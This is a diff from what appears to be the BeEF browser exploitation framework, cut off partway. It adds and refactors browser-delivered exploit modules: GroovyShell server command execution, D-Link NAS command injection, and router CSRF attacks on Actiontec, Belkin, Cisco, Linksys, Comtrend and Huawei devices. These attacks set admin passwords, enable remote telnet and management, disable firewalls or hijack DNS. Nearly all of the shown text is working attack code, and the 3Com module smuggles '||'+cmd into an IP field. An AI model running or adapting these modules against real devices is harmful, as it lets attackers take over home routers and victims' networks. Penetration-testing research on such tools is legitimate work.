+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(groovy_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/groovyshell_server_cmd_exec/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        groovyshell_server_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "GroovyShell Server Command Execution"
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]

modules/exploits/groovyshell_server_cmd_exec/module.rb

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js

@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/system_mgr.cgi';
+	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	var timeout = 15;
+
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
+		{'type':'hidden', 'name':'command1', 'value':cmd}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        dlink_sharecenter_cmd_exec:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "D-Link ShareCenter Command Execution"
+            description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+            authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+            target:
+                working: ["ALL"]

modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+			{'name'=>'cmd',  'ui_label'=>'Command',         'value'=>'ls'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/php-5.3.9-dos/command.js

@@ -32,7 +32,7 @@ function serializeObj (obj) {
 }
 
 // Run attack
-function attackSite (target_url) {
+function php_dos (target_url) {
     var bad = serializeObj(createEvilObj());
     var xhr = new XMLHttpRequest();
     xhr.open("POST", target_url, true);
@@ -42,10 +42,10 @@ function attackSite (target_url) {
 }
 
 try {
-    attackSite("<%= @url %>");
-    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
+    php_dos("<%= @url %>");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
 } catch (e) {
-    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
 }
 
 });

modules/exploits/php-5.3.9-dos/module.rb

@@ -13,7 +13,8 @@ class Php_dos < BeEF::Core::Command
 
 	def post_execute
 		content = {}
-		content['result'] = @datastore['result']
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		content['fail']    = @datastore['fail']   if not @datastore['fail'].nil?
 		save content
 	end
 

modules/exploits/qnx_qconn_command_execution/command.js

@@ -30,12 +30,12 @@ beef.execute(function() {
 	}
 
 	// send commands
-	var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	// clean up
 	cleanup = function() {
-		document.body.removeChild(qnx_iframe);
+		document.body.removeChild(qnx_iframe_<%= @command_id %>);
 	}
 	setTimeout("cleanup()", timeout*1000);
 

modules/exploits/router/3com_officeconnect_cmd_exec/command.js

@@ -9,8 +9,9 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var path    = 'utility.cgi';
 	var cmd     = '<%= @cmd %>';
+	var timeout = 15;
 
-	var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
 		{'type':'hidden', 'name':'testType', 'value':'1'},
 		{'type':'hidden', 'name':'IP',       'value':'||'+cmd}
 	]);
@@ -18,9 +19,9 @@ beef.execute(function() {
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(com_officeconnect_iframe);
+		document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/actiontec_q1000_csrf/command.js

@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var user    = '<%= @user %>';
+	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';
+	var timeout = 15;
+
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
+		{'type':'hidden', 'name':'adminUserName',       'value':user},
+		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
+		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remGuiPort',          'value':port}
+	]);
+
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
+		{'type':'hidden', 'name':'remTelUser',          'value':user},
+		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
+		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
+	]);
+
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
+		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
+	]);
+
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
+		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/actiontec_q1000_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        actiontec_q1000_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Actiontec Q1000 CSRF"
+            description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+            authors: ["james-otten"]
+            target:
+                working: ["ALL"]

modules/exploits/router/actiontec_q1000_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+			{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/asmax_ar804gu_cmd_exec/command.js

@@ -14,7 +14,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.id = 'asmax_ar804gu';
+	img.id = 'asmax_ar804gu_<%= @command_id %>';
 	img.src = gateway+path+cmd;
 	document.body.appendChild(img);
 

modules/exploits/router/belkin_dns_csrf/command.js

@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/setup_dns.exe';
+	var dns     = '<%= @dns %>';
+	var timeout = 15;
+
+	// validate DNS server IP address
+	var parts = dns.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns_1 = parts[0];
+	var dns_2 = parts[1];
+	var dns_3 = parts[2];
+	var dns_4 = parts[3];
+
+	// attempt auth with default password (admin)
+	// incorrect login attempts do not log out an authenticated session
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height","0");
+	img.id = 'belkin_auth_<%= @command_id %>';
+	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	document.body.appendChild(img);
+
+	// change DNS
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(belkin_iframe_<%= @command_id %>);
+		document.body.removeChild(belkin_auth_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/belkin_dns_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        belkin_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Belkin DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/router/belkin_dns_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested
+###
+class Belkin_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/bt_home_hub_csrf/command.js

@@ -6,21 +6,21 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-
-
-  var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
-      [{'type':'hidden', 'name':'0', 'value':'31'} ,
-       {'type':'hidden', 'name':'1', 'value':''},
-       {'type':'hidden', 'name':'30', 'value':passwd}]);
+  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
+    {'type':'hidden', 'name':'0',  'value':'31'} ,
+    {'type':'hidden', 'name':'1',  'value':''},
+    {'type':'hidden', 'name':'30', 'value':passwd}
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(bt_home_hub_iframe);
+    document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/cisco_e2400_csrf/command.js

@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',     'value':'Management'},
        {'type':'hidden', 'name':'change_action',     'value':''},
@@ -37,7 +38,7 @@ beef.execute(function() {
        {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
       ]);
 
-  var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',       'value':'Firewall'},
        {'type':'hidden', 'name':'change_action',       'value':''},
@@ -59,10 +60,10 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(cisco_e2400_iframe1);
-    document.body.removeChild(cisco_e2400_iframe2);
+    document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
+    document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/comtrend_ct5367_csrf/command.js

@@ -6,12 +6,13 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', gateway + "password.cgi");
@@ -37,16 +38,16 @@ beef.execute(function() {
   input.setAttribute('value', passwd);
   form.appendChild(input);
 
-  ct5367_iframe2.contentWindow.document.body.appendChild(form);
+  ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/comtrend_ct5624_csrf/command.js

@@ -6,21 +6,22 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
-  ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/dlink_dir_615_csrf/command.js

@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
       [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
        {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
        {'type':'hidden', 'name':'admin_name',      'value':'admin'},
@@ -23,9 +24,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dir615_iframe);
+    document.body.removeChild(dir615_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/dlink_dsl500t_csrf/command.js

@@ -6,9 +6,10 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
+  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -19,9 +20,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dsl500t_iframe);
+    document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/huawei_smartax_mt880/command.js

@@ -5,19 +5,20 @@
 //
 
 beef.execute(function() {
-  var gateway = '<%= @base %>'; 
+  var gateway  = '<%= @base %>'; 
   var username = '<%= @username %>';
-  var passwd = '<%= @password %>';
+  var passwd   = '<%= @password %>';
+  var timeout  = 15;
 
-  var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
-  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+  var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(huawei_smartax_mt880_iframe);
+    document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_befsr41_csrf/command.js

@@ -5,15 +5,17 @@
 //
 
 beef.execute(function() {
+  var timeout = 15;
+
+  var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
 
-  var befsr41_iframe = beef.dom.createInvisibleIframe();
-  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(befsr41_iframe);
+    document.body.removeChild(befsr41_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_wrt54g2_csrf/command.js

@@ -5,11 +5,12 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
       [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
        {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
        {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -27,9 +28,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g2_iframe);
+    document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_wrt54g_csrf/command.js

@@ -5,31 +5,33 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
-      [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
-          {'type':'hidden', 'name':'http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'https_enable', 'value':'0'},
-          {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
-          {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+      [
+          {'type':'hidden', 'name':'remote_mgt_https',   'value':'0'} ,
+          {'type':'hidden', 'name':'http_enable',        'value':'1'},
+          {'type':'hidden', 'name':'https_enable',       'value':'0'},
+          {'type':'hidden', 'name':'PasswdModify',       'value':'1'},
+          {'type':'hidden', 'name':'http_passwd',        'value':passwd},
           {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
-          {'type':'hidden', 'name':'_http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'remote_management', 'value':'1'},
-          {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
-          {'type':'hidden', 'name':'http_wanport', 'value':port},
-          {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
-          {'type':'hidden', 'name':'layout', 'value':'en'}
+          {'type':'hidden', 'name':'_http_enable',       'value':'1'},
+          {'type':'hidden', 'name':'remote_management',  'value':'1'},
+          {'type':'hidden', 'name':'web_wl_filter',      'value':'1'},
+          {'type':'hidden', 'name':'http_wanport',       'value':port},
+          {'type':'hidden', 'name':'upnp_enable',        'value':'1'},
+          {'type':'hidden', 'name':'layout',             'value':'en'}
       ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g_iframe);
